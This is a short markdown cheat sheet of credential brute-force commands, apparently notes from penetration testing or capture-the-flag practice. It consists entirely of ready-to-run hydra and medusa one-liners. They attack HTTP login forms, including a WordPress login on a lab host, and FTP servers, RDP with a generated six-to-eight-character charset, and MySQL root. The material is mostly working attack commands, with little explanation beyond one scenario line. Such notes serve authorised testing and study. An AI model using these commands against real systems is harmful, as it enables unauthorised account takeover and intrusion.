# login-form-brute-force

## HTTP-Post-form

```
hydra -l admin -P /path/to/password_list.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"
```

                                            OR

```
hydra -L /usr/share/seclists/Usernames/cirt-default-usernames.txt -p admin@123 "http-post-form://blog.bigbang.htb/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fblog.bigbang.htb%2Fwp-admin%2F&testcookie=1:F=not registered on this site"
```

## Other service

```
hydra -l admin -P /path/to/password_list.txt ftp://server.com
```

## Brute force multiple FTP server

```
hydra -L usernames.txt -P passwords.txt -s 2121 -M targets.txt ftp
```

## Advanced RDP brute-forcing

*You suspect the username is "administrator," and that the password consists of 6 to 8 characters, including lowercase letters, uppercase letters, and numbers.*

```
hydra -l administrator -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 192.168.1.100 rdp
```

## Brute-force with medusa

**Http brute-force**

```
medusa -M http -h http://www.example.com -U users.txt -P passwords.txt -m DIR:/login.php -m FORM:username=^USER^&password=^PASS^
```

**Other services**

```
medusa -M mysql -h 192.168.1.100 -u root -P passwords.txt
```